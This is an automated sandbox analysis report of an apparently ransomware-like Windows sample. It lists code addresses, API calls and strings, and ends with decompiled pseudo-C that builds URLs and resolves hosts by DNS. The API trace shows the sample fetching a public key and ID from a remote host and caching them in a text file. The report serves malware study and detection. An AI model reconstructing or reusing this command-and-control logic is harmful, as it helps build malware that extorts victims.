                                                                                    0x0041eea6
                                                                                    0x0041eeab
                                                                                    0x0041eeac
                                                                                    0x0041eeac
                                                                                    0x0041eebc
                                                                                    0x0041eec1
                                                                                    0x0041eec4
                                                                                    0x0041eecc
                                                                                    0x0041eed4
                                                                                    0x0041eed9
                                                                                    0x0041eee1
                                                                                    0x0041eee1
                                                                                    0x0041eee3
                                                                                    0x0041eee7
                                                                                    0x0041eee7
                                                                                    0x0041eeea
                                                                                    0x0041eeed
                                                                                    0x0041eef3
                                                                                    0x0041eef5
                                                                                    0x0041eef8
                                                                                    0x0041eef8
                                                                                    0x0041eefa
                                                                                    0x0041eefb
                                                                                    0x0041eefb
                                                                                    0x0041eeff
                                                                                    0x0041eeff
                                                                                    0x00000000
                                                                                    0x0041eeff
                                                                                    0x0041eeef
                                                                                    0x0041ef01
                                                                                    0x0041ef01
                                                                                    0x0041ef07
                                                                                    0x0041ef0c
                                                                                    0x0041ef0d
                                                                                    0x0041ef0d
                                                                                    0x0041ef12
                                                                                    0x0041ef1c
                                                                                    0x0041ef20
                                                                                    0x0041ef24
                                                                                    0x0041ef2b
                                                                                    0x0041ef33
                                                                                    0x0041ef35
                                                                                    0x0041ef40
                                                                                    0x0041ef45
                                                                                    0x0041ef48
                                                                                    0x0041ef4c
                                                                                    0x0041ef4e
                                                                                    0x0041ef4e
                                                                                    0x0041ef50
                                                                                    0x0041ef61
                                                                                    0x0041ef63
                                                                                    0x0041ef68
                                                                                    0x0041ef6e
                                                                                    0x0041ef73
                                                                                    0x0041ef73
                                                                                    0x0041ef76
                                                                                    0x0041ef79
                                                                                    0x0041ef7e
                                                                                    0x0041ef84
                                                                                    0x0041ef88
                                                                                    0x0041ef8f
                                                                                    0x0041ef97
                                                                                    0x0041ef9a
                                                                                    0x0041efa7
                                                                                    0x0041efac
                                                                                    0x0041efaf
                                                                                    0x0041efb3
                                                                                    0x0041efb5
                                                                                    0x0041efb5
                                                                                    0x0041efbf
                                                                                    0x0041efc1
                                                                                    0x0041efc6
                                                                                    0x0041efcc
                                                                                    0x0041efd1
                                                                                    0x0041efd1
                                                                                    0x0041efd4
                                                                                    0x0041efd9
                                                                                    0x0041efe0
                                                                                    0x0041efe6
                                                                                    0x0041efeb
                                                                                    0x0041efeb
                                                                                    0x0041efee
                                                                                    0x0041eff3
                                                                                    0x0041effb
                                                                                    0x0041f003
                                                                                    0x0041f008
                                                                                    0x0041f00e
                                                                                    0x0041f013
                                                                                    0x0041f016
                                                                                    0x0041f01a
                                                                                    0x0041f021
                                                                                    0x0041f025
                                                                                    0x0041f030
                                                                                    0x0041f030
                                                                                    0x0041ee3c
                                                                                    0x0041e6e0
                                                                                    0x0041e6e0
                                                                                    0x0041e6f0
                                                                                    0x0041e6fc
                                                                                    0x0041e707
                                                                                    0x0041e70c
                                                                                    0x0041e70f
                                                                                    0x0041e722
                                                                                    0x00000000
                                                                                    0x0041e724
                                                                                    0x0041e724
                                                                                    0x0041e724
                                                                                    0x0041e722
                                                                                    0x0041e6e0
                                                                                    0x00000000
                                                                                    0x0041ebea
                                                                                    0x0041ebe4
                                                                                    0x0041eb14
                                                                                    0x00000000
                                                                                    0x0041eb14
                                                                                    0x0041ead0
                                                                                    0x0041ead0
                                                                                    0x0041ead8
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0041eae1
                                                                                    0x0041eae3
                                                                                    0x0041eae5
                                                                                    0x0041eae7
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0041eae9
                                                                                    0x0041eaeb
                                                                                    0x00000000
                                                                                    0x0041eaeb
                                                                                    0x0041ea46
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0041ea4c
                                                                                    0x0041ea59
                                                                                    0x0041ea61
                                                                                    0x0041ea74
                                                                                    0x0041ea82
                                                                                    0x0041ea82
                                                                                    0x00000000
                                                                                    0x0041e72e
                                                                                    0x0041e73b
                                                                                    0x0041e749
                                                                                    0x0041e74b
                                                                                    0x0041e755
                                                                                    0x0041e75d
                                                                                    0x0041e762
                                                                                    0x0041e765
                                                                                    0x0041e768
                                                                                    0x0041e76f
                                                                                    0x0041e772
                                                                                    0x0041e778
                                                                                    0x0041e77a
                                                                                    0x0041e77a
                                                                                    0x0041e780
                                                                                    0x0041e780
                                                                                    0x0041e783
                                                                                    0x0041e786
                                                                                    0x0041e789
                                                                                    0x00000000
                                                                                    0x0041e78b
                                                                                    0x0041e78b
                                                                                    0x0041e78b
                                                                                    0x0041e78d
                                                                                    0x00000000
                                                                                    0x0041e78d
                                                                                    0x0041e774
                                                                                    0x0041e774
                                                                                    0x0041e78f
                                                                                    0x0041e78f
                                                                                    0x0041e795
                                                                                    0x0041e79a
                                                                                    0x0041e7a3
                                                                                    0x0041e7a8
                                                                                    0x0041e7ad
                                                                                    0x0041e7ae
                                                                                    0x0041e7b3
                                                                                    0x0041e7b6
                                                                                    0x0041e7b8
                                                                                    0x0041e7be
                                                                                    0x0041e7c3
                                                                                    0x0041e7c5
                                                                                    0x0041e7c7
                                                                                    0x0041e7ce
                                                                                    0x0041e7d6
                                                                                    0x0041e7de
                                                                                    0x0041e7ec
                                                                                    0x0041e7ee
                                                                                    0x0041e7f5
                                                                                    0x0041e7f7
                                                                                    0x0041e80e
                                                                                    0x0041e816
                                                                                    0x0041e81e
                                                                                    0x0041e823
                                                                                    0x0041e827
                                                                                    0x0041e844
                                                                                    0x0041e848
                                                                                    0x0041e829
                                                                                    0x0041e82c
                                                                                    0x0041e82c
                                                                                    0x0041e82d
                                                                                    0x0041e838
                                                                                    0x0041e83d
                                                                                    0x0041e83d
                                                                                    0x0041e82d
                                                                                    0x0041e851
                                                                                    0x0041e858
                                                                                    0x0041e85c
                                                                                    0x0041e85e
                                                                                    0x0041e865
                                                                                    0x0041e86c
                                                                                    0x0041e86c
                                                                                    0x0041e86f
                                                                                    0x0041e874
                                                                                    0x0041e87a
                                                                                    0x0041e87f
                                                                                    0x0041e87f
                                                                                    0x0041e874
                                                                                    0x0041e882
                                                                                    0x0041e88d

                                                                                    APIs
                                                                                    • timeGetTime.WINMM ref: 0041E6C0
                                                                                      • Part of subcall function 0040C6A0: RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,?), ref: 0040C6C2
                                                                                      • Part of subcall function 0040C6A0: RegQueryValueExW.ADVAPI32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                                                                      • Part of subcall function 0040C6A0: RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                                                                                    • _memset.LIBCMT ref: 0041E707
                                                                                      • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0040C51B
                                                                                    • InternetOpenW.WININET ref: 0041E743
                                                                                    • _wcsstr.LIBCMT ref: 0041E7AE
                                                                                    • _memmove.LIBCMT ref: 0041E838
                                                                                    • lstrcpyW.KERNEL32 ref: 0041E90A
                                                                                    • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                                                                                    • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                                                                                    • _strstr.LIBCMT ref: 0041EA36
                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                                                                                    • DeleteFileA.KERNEL32(?), ref: 0041EA82
                                                                                    • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                                                                                    • lstrlenA.KERNEL32(?), ref: 0041EAC8
                                                                                    • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                                                                                    • lstrcpyW.KERNEL32 ref: 0041EB5B
                                                                                    • lstrlenA.KERNEL32(?), ref: 0041EB7C
                                                                                    • _malloc.LIBCMT ref: 0041EB86
                                                                                    • _memset.LIBCMT ref: 0041EB94
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                                                                                    • lstrcpyW.KERNEL32 ref: 0041EBB6
                                                                                    • _strstr.LIBCMT ref: 0041EBDA
                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                                                                                    • DeleteFileA.KERNEL32(?), ref: 0041EC32
                                                                                    • lstrlenW.KERNEL32(?), ref: 0041EC3E
                                                                                    • lstrlenA.KERNEL32(","id":"), ref: 0041EC51
                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 0041EC6D
                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 0041EC7F
                                                                                    • lstrlenA.KERNEL32(?), ref: 0041EC93
                                                                                    • lstrlenA.KERNEL32(00000022), ref: 0041ECB3
                                                                                    • lstrcpyW.KERNEL32 ref: 0041ED2A
                                                                                    • lstrlenA.KERNEL32(?), ref: 0041ED4B
                                                                                    • _malloc.LIBCMT ref: 0041ED55
                                                                                    • _memset.LIBCMT ref: 0041ED63
                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 0041ED7D
                                                                                    • lstrcpyW.KERNEL32 ref: 0041ED85
                                                                                    • lstrlenW.KERNEL32(?), ref: 0041EDA3
                                                                                    • lstrlenW.KERNEL32(?), ref: 0041EDAE
                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EDD3
                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EDF7
                                                                                    • DeleteFileA.KERNEL32(?), ref: 0041EE05
                                                                                    • _free.LIBCMT ref: 0041EE15
                                                                                    • _free.LIBCMT ref: 0041EE22
                                                                                    • lstrcpyW.KERNEL32 ref: 0041EF61
                                                                                    • lstrcpyW.KERNEL32 ref: 0041EFBF
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000002.00000002.384651495.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000002.00000002.384781279.0000000000529000.00000040.00000400.00020000.00000000.sdmp
                                                                                    • Associated: 00000002.00000002.384786115.000000000052B000.00000040.00000400.00020000.00000000.sdmp
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_2_2_400000_bE5aaTiJM0.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                    • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                    • API String ID: 704684250-3586605218
                                                                                    • Opcode ID: ab0c2a3771126956d15e600cc244ccaba4167f4cf519e74898ab1ace71ecfc18
                                                                                    • Instruction ID: 6dbc96f3ccd93c00a013485041b5c7257b0a9ae09bebbc57280f72cccf7ce4d8
                                                                                    • Opcode Fuzzy Hash: ab0c2a3771126956d15e600cc244ccaba4167f4cf519e74898ab1ace71ecfc18
                                                                                    • Instruction Fuzzy Hash: FA421771508341ABD720DF25DC45BDB7BE8BF85308F44092EF88587292DB78E589CB9A
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 64%
                                                                                    			E0040DD40(char* __ecx, char _a4, intOrPtr _a20, signed int _a24) {
                                                                                    				char _v8;
                                                                                    				intOrPtr _v16;
                                                                                    				char _v17;
                                                                                    				char _v18;
                                                                                    				intOrPtr _v24;
                                                                                    				signed int _v28;
                                                                                    				signed int _v32;
                                                                                    				intOrPtr _v36;
                                                                                    				signed int _v40;
                                                                                    				signed int _v44;
                                                                                    				intOrPtr _v48;
                                                                                    				signed int _v52;
                                                                                    				signed int _v56;
                                                                                    				char _v60;
                                                                                    				char _v76;
                                                                                    				signed int _v80;
                                                                                    				char _v84;
                                                                                    				char _v100;
                                                                                    				signed int _v104;
                                                                                    				signed int _v108;
                                                                                    				signed int _v112;
                                                                                    				signed int _v116;
                                                                                    				char _v120;
                                                                                    				intOrPtr _v124;
                                                                                    				void* _v128;
                                                                                    				signed int _v132;
                                                                                    				short* _v136;
                                                                                    				signed int _v140;
                                                                                    				WCHAR* _v144;
                                                                                    				WCHAR* _v148;
                                                                                    				WCHAR* _v152;
                                                                                    				WCHAR* _v156;
                                                                                    				WCHAR* _v160;
                                                                                    				char _v168;
                                                                                    				char _v172;
                                                                                    				char _v20650;
                                                                                    				short _v20652;
                                                                                    				char _v41130;
                                                                                    				char _v41132;
                                                                                    				void* __ebx;
                                                                                    				void* __edi;
                                                                                    				void* __esi;
                                                                                    				void* __ebp;
                                                                                    				void* _t295;
                                                                                    				void* _t298;
                                                                                    				signed int _t305;
                                                                                    				WCHAR* _t308;
                                                                                    				void* _t309;
                                                                                    				signed int _t314;
                                                                                    				void* _t315;
                                                                                    				signed int _t326;
                                                                                    				signed int _t329;
                                                                                    				WCHAR* _t337;
                                                                                    				intOrPtr* _t344;
                                                                                    				signed int _t347;
                                                                                    				void _t351;
                                                                                    				signed int _t353;
                                                                                    				char* _t355;
                                                                                    				intOrPtr _t356;
                                                                                    				signed int _t362;
                                                                                    				signed int _t379;
                                                                                    				signed int _t387;
                                                                                    				signed int _t402;
                                                                                    				signed int _t403;
                                                                                    				signed int _t405;
                                                                                    				signed int _t407;
                                                                                    				signed int _t409;
                                                                                    				char* _t411;
                                                                                    				signed int _t412;
                                                                                    				signed int _t417;
                                                                                    				signed int _t425;
                                                                                    				signed int _t437;
                                                                                    				intOrPtr* _t438;
                                                                                    				short* _t439;
                                                                                    				signed int _t440;
                                                                                    				signed int _t442;
                                                                                    				signed int _t444;
                                                                                    				void* _t445;
                                                                                    				intOrPtr* _t450;
                                                                                    				signed int _t451;
                                                                                    				signed int _t452;
                                                                                    				char* _t455;
                                                                                    				void* _t457;
                                                                                    				intOrPtr _t459;
                                                                                    				signed int _t462;
                                                                                    				signed int _t463;
                                                                                    				unsigned int _t471;
                                                                                    				signed int _t472;
                                                                                    				char* _t475;
                                                                                    				unsigned int _t484;
                                                                                    				signed int _t485;
                                                                                    				void* _t488;
                                                                                    				intOrPtr* _t493;
                                                                                    				signed int _t494;
                                                                                    				signed int _t496;
                                                                                    				char* _t502;
                                                                                    				void* _t505;
                                                                                    				void* _t509;
                                                                                    				unsigned int _t511;
                                                                                    				unsigned int _t515;
                                                                                    				intOrPtr _t518;
                                                                                    				unsigned int _t520;
                                                                                    				unsigned int _t524;
                                                                                    				signed int _t526;
                                                                                    				signed int _t527;
                                                                                    				void* _t532;
                                                                                    				intOrPtr _t533;
                                                                                    				signed int _t534;
                                                                                    				void* _t538;
                                                                                    				signed int _t539;
                                                                                    				signed int _t540;
                                                                                    				void* _t541;
                                                                                    				signed int _t542;
                                                                                    				signed int _t544;
                                                                                    				signed int _t546;
                                                                                    				signed int _t547;
                                                                                    				void* _t548;
                                                                                    				char* _t551;
                                                                                    				intOrPtr _t553;
                                                                                    				void* _t554;
                                                                                    				signed int _t555;
                                                                                    				signed int _t558;
                                                                                    				char* _t559;
                                                                                    				void* _t560;
                                                                                    				intOrPtr _t561;
                                                                                    				void* _t562;
                                                                                    				void* _t563;
                                                                                    				void* _t564;
                                                                                    				void* _t565;
                                                                                    				char* _t567;
                                                                                    
                                                                                    				_t446 = __ecx;
                                                                                    				_push(0xffffffff);
                                                                                    				_push(0x4ca9a8);
                                                                                    				_push( *[fs:0x0]);
                                                                                    				 *[fs:0x0] = _t561;
                                                                                    				E0042F7C0(0xa0a0);
                                                                                    				_push(_t437);
                                                                                    				_push(_t541);
                                                                                    				_push(_t532);
                                                                                    				_v136 = __ecx;
                                                                                    				_v172 = 0;
                                                                                    				_v8 = 0;
                                                                                    				_push(L"http://");
                                                                                    				_t294 =  >=  ? _a4 :  &_a4;
                                                                                    				_push( >=  ? _a4 :  &_a4);
                                                                                    				_t295 = E00421C02(__ecx);
                                                                                    				_t562 = _t561 + 8;
                                                                                    				if(_t295 != 0) {
                                                                                    					_push(7);
                                                                                    					_t446 =  &_a4;
                                                                                    					E00413340(_t437,  &_a4, _t532, _t541, 0);
                                                                                    				}
                                                                                    				_push(L"https://");
                                                                                    				_t297 =  >=  ? _a4 :  &_a4;
                                                                                    				_push( >=  ? _a4 :  &_a4);
                                                                                    				_t298 = E00421C02(_t446);
                                                                                    				_t563 = _t562 + 8;
                                                                                    				if(_t298 != 0) {
                                                                                    					_push(8);
                                                                                    					E00413340(_t437,  &_a4, _t532, _t541, 0);
                                                                                    				}
                                                                                    				_v41132 = 0;
                                                                                    				E0042B420( &_v41130, 0, 0x4ffe);
                                                                                    				_t533 = lstrlenW;
                                                                                    				_t564 = _t563 + 0xc;
                                                                                    				_t447 = _a24;
                                                                                    				_t542 = 0;
                                                                                    				_t502 = _a4;
                                                                                    				while(1) {
                                                                                    					_t303 =  >=  ? _t502 :  &_a4;
                                                                                    					if(_t542 >= lstrlenW( >=  ? _t502 :  &_a4)) {
                                                                                    						break;
                                                                                    					}
                                                                                    					if(_a20 <= _t542) {
                                                                                    						_push("invalid string position");
                                                                                    						E0044F26C(__eflags);
                                                                                    						L16:
                                                                                    						_t493 = _t502;
                                                                                    						_t52 = _t493 + 1; // 0x1
                                                                                    						_t554 = _t52;
                                                                                    						goto L17;
                                                                                    						L19:
                                                                                    						_push(_t494);
                                                                                    						E004156D0(_t437,  &_v100, _t533, _t502);
                                                                                    						_v8 = 3;
                                                                                    						_t305 =  &_v100;
                                                                                    						_t496 = _v40;
                                                                                    						__eflags = _t305 - _t496;
                                                                                    						if(_t305 >= _t496) {
                                                                                    							L29:
                                                                                    							__eflags = _t496 - _t533;
                                                                                    							if(_t496 == _t533) {
                                                                                    								_t305 = E00415230(_t437,  &_v44, _t533, _t496);
                                                                                    								_t533 = _v36;
                                                                                    								_t496 = _v40;
                                                                                    							}
                                                                                    							__eflags = _t496;
                                                                                    							if(_t496 != 0) {
                                                                                    								 *(_t496 + 0x14) = 0xf;
                                                                                    								 *((intOrPtr*)(_t496 + 0x10)) = 0;
                                                                                    								 *_t496 = 0;
                                                                                    								__eflags = _v80 - 0x10;
                                                                                    								if(_v80 >= 0x10) {
                                                                                    									 *_t496 = _v100;
                                                                                    									_v100 = 0;
                                                                                    								} else {
                                                                                    									_t417 = _v84 + 1;
                                                                                    									__eflags = _t417;
                                                                                    									if(_t417 != 0) {
                                                                                    										E004205A0(_t496,  &_v100, _t417);
                                                                                    										_t496 = _v40;
                                                                                    										_t564 = _t564 + 0xc;
                                                                                    									}
                                                                                    								}
                                                                                    								 *((intOrPtr*)(_t496 + 0x10)) = _v84;
                                                                                    								_t305 = _v80;
                                                                                    								 *(_t496 + 0x14) = _t305;
                                                                                    								_v80 = 0xf;
                                                                                    								_v84 = 0;
                                                                                    								_v100 = 0;
                                                                                    							}
                                                                                    							L37:
                                                                                    							_t447 = _t496 + 0x18;
                                                                                    							_v8 = 2;
                                                                                    							__eflags = _v80 - 0x10;
                                                                                    							_v40 = _t496 + 0x18;
                                                                                    							if(_v80 >= 0x10) {
                                                                                    								_t305 = L00422587(_v100);
                                                                                    								_t564 = _t564 + 4;
                                                                                    							}
                                                                                    							_t555 = _v44;
                                                                                    							L40:
                                                                                    							_t437 = _t437 + 1;
                                                                                    							__eflags = _t437 - 4;
                                                                                    							if(_t437 < 4) {
                                                                                    								L11:
                                                                                    								__imp__#52( *((intOrPtr*)(_t560 + _t437 * 4 - 0x9c)));
                                                                                    								__eflags = _t305;
                                                                                    								if(_t305 == 0) {
                                                                                    									goto L40;
                                                                                    								}
                                                                                    								__eflags =  *((short*)(_t305 + 0xa));
                                                                                    								if( *((short*)(_t305 + 0xa)) <= 0) {
                                                                                    									goto L40;
                                                                                    								}
                                                                                    								_t411 =  *((intOrPtr*)( *((intOrPtr*)(_t305 + 0xc))));
                                                                                    								__imp__#12( *_t411);
                                                                                    								_t502 = _t411;
                                                                                    								_v80 = 0xf;
                                                                                    								_v84 = 0;
                                                                                    								_v100 = 0;
                                                                                    								__eflags =  *_t502;
                                                                                    								if( *_t502 != 0) {
                                                                                    									goto L16;
                                                                                    								} else {
                                                                                    									_t494 = 0;
                                                                                    									goto L19;
                                                                                    								}
                                                                                    							}
                                                                                    							__eflags = _a24 - 8;
                                                                                    							_push("/");
                                                                                    							_t307 =  >=  ? _a4 :  &_a4;
                                                                                    							_push( >=  ? _a4 :  &_a4);
                                                                                    							_t308 = E00421C02(_t447);
                                                                                    							_t565 = _t564 + 8;
                                                                                    							_v144 = _t308;
                                                                                    							_t309 = LocalAlloc(0x40, 8);
                                                                                    							_t534 = _v40;
                                                                                    							_t544 = 0;
                                                                                    							_t438 = _v44;
                                                                                    							_v128 = _t309;
                                                                                    							_v52 = 0;
                                                                                    							_v116 = 0;
                                                                                    							_t314 = (0x2aaaaaab * (_t534 - _t438) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t534 - _t438) >> 0x20 >> 2);
                                                                                    							__eflags = _t314;
                                                                                    							_v108 = _t314;
                                                                                    							if(_t314 == 0) {
                                                                                    								L121:
                                                                                    								_t315 = _v128;
                                                                                    								__eflags = _t315;
                                                                                    								if(_t315 != 0) {
                                                                                    									LocalFree(_t315);
                                                                                    								}
                                                                                    								__imp__DnsFree(_v104, 1);
                                                                                    								_v20652 = 0;
                                                                                    								E0042B420( &_v20650, 0, 0x4ffe);
                                                                                    								_t565 = _t565 + 0xc;
                                                                                    								lstrcpyW( &_v20652, L"http://");
                                                                                    								__eflags = _t544;
                                                                                    								if(_t544 == 0) {
                                                                                    									L130:
                                                                                    									__eflags = _a24 - 8;
                                                                                    									_t322 =  >=  ? _a4 :  &_a4;
                                                                                    									lstrcatW( &_v20652,  >=  ? _a4 :  &_a4);
                                                                                    									goto L131;
                                                                                    								} else {
                                                                                    									_t567 = _t565 - 0x18;
                                                                                    									_t455 = _t567;
                                                                                    									_push(0xffffffff);
                                                                                    									 *(_t455 + 0x14) = 0xf;
                                                                                    									 *((intOrPtr*)(_t455 + 0x10)) = 0;
                                                                                    									 *_t455 = 0;
                                                                                    									E00413FF0(0, _t455, _v32, 0);
                                                                                    									_t337 = E00412900( &_v168, 0);
                                                                                    									_t565 = _t567 + 0x18;
                                                                                    									__eflags = _t337[0xa] - 8;
                                                                                    									if(_t337[0xa] >= 8) {
                                                                                    										_t337 =  *_t337;
                                                                                    									}
                                                                                    									_t544 = lstrcatW;
                                                                                    									lstrcatW( &_v20652, _t337);
                                                                                    									__eflags = _v148 - 8;
                                                                                    									if(_v148 >= 8) {
                                                                                    										L00422587(_v168);
                                                                                    										_t565 = _t565 + 4;
                                                                                    									}
                                                                                    									lstrcatW( &_v20652, _v144);
                                                                                    									L131:
                                                                                    									_t439 = _v136;
                                                                                    									 *((intOrPtr*)(_t439 + 0x14)) = 7;
                                                                                    									 *((intOrPtr*)(_t439 + 0x10)) = 0;
                                                                                    									 *_t439 = 0;
                                                                                    									__eflags = _v20652;
                                                                                    									if(_v20652 != 0) {
                                                                                    										_t450 =  &_v20652;
                                                                                    										_t505 = _t450 + 2;
                                                                                    										do {
                                                                                    											_t326 =  *_t450;
                                                                                    											_t450 = _t450 + 2;
                                                                                    											__eflags = _t326;
                                                                                    										} while (_t326 != 0);
                                                                                    										_t451 = _t450 - _t505;
                                                                                    										__eflags = _t451;
                                                                                    										_t452 = _t451 >> 1;
                                                                                    										L136:
                                                                                    										_push(_t452);
                                                                                    										E00415C10(_t439, _t439, _t534, _t544,  &_v20652);
                                                                                    										_t329 = _v32;
                                                                                    										__eflags = _t329;
                                                                                    										if(_t329 == 0) {
                                                                                    											L144:
                                                                                    											_t440 = _v44;
                                                                                    											__eflags = _t440;
                                                                                    											if(_t440 == 0) {
                                                                                    												L150:
                                                                                    												__eflags = _a24 - 8;
                                                                                    												if(_a24 >= 8) {
                                                                                    													L00422587(_a4);
                                                                                    												}
                                                                                    												 *[fs:0x0] = _v16;
                                                                                    												return _v136;
                                                                                    											}
                                                                                    											_t546 = _t440;
                                                                                    											__eflags = _t440 - _t534;
                                                                                    											if(_t440 == _t534) {
                                                                                    												L149:
                                                                                    												L00422587(_t440);
                                                                                    												_t565 = _t565 + 4;
                                                                                    												goto L150;
                                                                                    											} else {
                                                                                    												goto L146;
                                                                                    											}
                                                                                    											do {
                                                                                    												L146:
                                                                                    												__eflags =  *(_t546 + 0x14) - 0x10;
                                                                                    												if( *(_t546 + 0x14) >= 0x10) {
                                                                                    													L00422587( *_t546);
                                                                                    													_t565 = _t565 + 4;
                                                                                    												}
                                                                                    												 *(_t546 + 0x14) = 0xf;
                                                                                    												 *((intOrPtr*)(_t546 + 0x10)) = 0;
                                                                                    												 *_t546 = 0;
                                                                                    												_t546 = _t546 + 0x18;
                                                                                    												__eflags = _t546 - _t534;
                                                                                    											} while (_t546 != _t534);
                                                                                    											goto L149;
                                                                                    										}
                                                                                    										_t442 = _v28;
                                                                                    										_t547 = _t329;
                                                                                    										__eflags = _t329 - _t442;
                                                                                    										if(_t329 == _t442) {
                                                                                    											L143:
                                                                                    											L00422587(_t329);
                                                                                    											_t565 = _t565 + 4;
                                                                                    											goto L144;
                                                                                    										}
                                                                                    										do {
                                                                                    											__eflags =  *(_t547 + 0x14) - 0x10;
                                                                                    											if( *(_t547 + 0x14) >= 0x10) {
                                                                                    												L00422587( *_t547);
                                                                                    												_t565 = _t565 + 4;
                                                                                    											}
                                                                                    											 *(_t547 + 0x14) = 0xf;
                                                                                    											 *((intOrPtr*)(_t547 + 0x10)) = 0;
                                                                                    											 *_t547 = 0;
                                                                                    											_t547 = _t547 + 0x18;
                                                                                    											__eflags = _t547 - _t442;
                                                                                    										} while (_t547 != _t442);
                                                                                    										_t329 = _v32;
                                                                                    										goto L143;
                                                                                    									}
                                                                                    									_t452 = 0;
                                                                                    									goto L136;
                                                                                    								}
                                                                                    							}
                                                                                    							_t344 = _t438;
                                                                                    							_v124 = _t438;
                                                                                    							do {
                                                                                    								__eflags =  *((intOrPtr*)(_t344 + 0x14)) - 0x10;
                                                                                    								if( *((intOrPtr*)(_t344 + 0x14)) >= 0x10) {
                                                                                    									_t344 =  *_t344;
                                                                                    								}
                                                                                    								__imp__#11(_t344);
                                                                                    								_t457 = _v128;
                                                                                    								 *((intOrPtr*)(_t457 + 4)) = _t344;
                                                                                    								 *_t457 = 1;
                                                                                    								__imp__DnsQuery_W( &_v41132, 2, 2, _t457,  &_v104, 0);
                                                                                    								_t347 = _v104;
                                                                                    								_v112 = _t347;
                                                                                    								__eflags = _t347;
                                                                                    								if(_t347 != 0) {
                                                                                    									_t444 = _v28;
                                                                                    									do {
                                                                                    										__imp__#12( *((intOrPtr*)(_t347 + 0x18)));
                                                                                    										_t544 = _t347;
                                                                                    										_v17 = 0;
                                                                                    										_v52 = _t544;
                                                                                    										_v120 = 0;
                                                                                    										_t534 = (0x2aaaaaab * (_t444 - _v32) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t444 - _v32) >> 0x20 >> 2);
                                                                                    										__eflags = _t534;
                                                                                    										_v140 = _t534;
                                                                                    										if(_t534 == 0) {
                                                                                    											L80:
                                                                                    											_t351 = _v17;
                                                                                    											L81:
                                                                                    											__eflags = _t351;
                                                                                    											if(_t351 != 0) {
                                                                                    												goto L118;
                                                                                    											}
                                                                                    											_v56 = 0xf;
                                                                                    											_v60 = 0;
                                                                                    											_v76 = _t351;
                                                                                    											__eflags =  *_t544 - _t351;
                                                                                    											if( *_t544 != _t351) {
                                                                                    												_t462 = _t544;
                                                                                    												_t168 = _t462 + 1; // 0x1
                                                                                    												_t509 = _t168;
                                                                                    												do {
                                                                                    													_t353 =  *_t462;
                                                                                    													_t462 = _t462 + 1;
                                                                                    													__eflags = _t353;
                                                                                    												} while (_t353 != 0);
                                                                                    												_t463 = _t462 - _t509;
                                                                                    												__eflags = _t463;
                                                                                    												L88:
                                                                                    												_push(_t463);
                                                                                    												E004156D0(_t444,  &_v76, _t534, _t544);
                                                                                    												_t355 =  &_v76;
                                                                                    												_v8 = 4;
                                                                                    												__eflags = _t355 - _t444;
                                                                                    												if(_t355 >= _t444) {
                                                                                    													L103:
                                                                                    													_t356 = _v48;
                                                                                    													__eflags = _t444 - _t356;
                                                                                    													if(_t444 != _t356) {
                                                                                    														L110:
                                                                                    														__eflags = _t444;
                                                                                    														if(_t444 != 0) {
                                                                                    															 *(_t444 + 0x14) = 0xf;
                                                                                    															 *((intOrPtr*)(_t444 + 0x10)) = 0;
                                                                                    															 *_t444 = 0;
                                                                                    															__eflags = _v56 - 0x10;
                                                                                    															if(_v56 >= 0x10) {
                                                                                    																 *_t444 = _v76;
                                                                                    																_v76 = 0;
                                                                                    															} else {
                                                                                    																_t362 = _v60 + 1;
                                                                                    																__eflags = _t362;
                                                                                    																if(_t362 != 0) {
                                                                                    																	E004205A0(_t444,  &_v76, _t362);
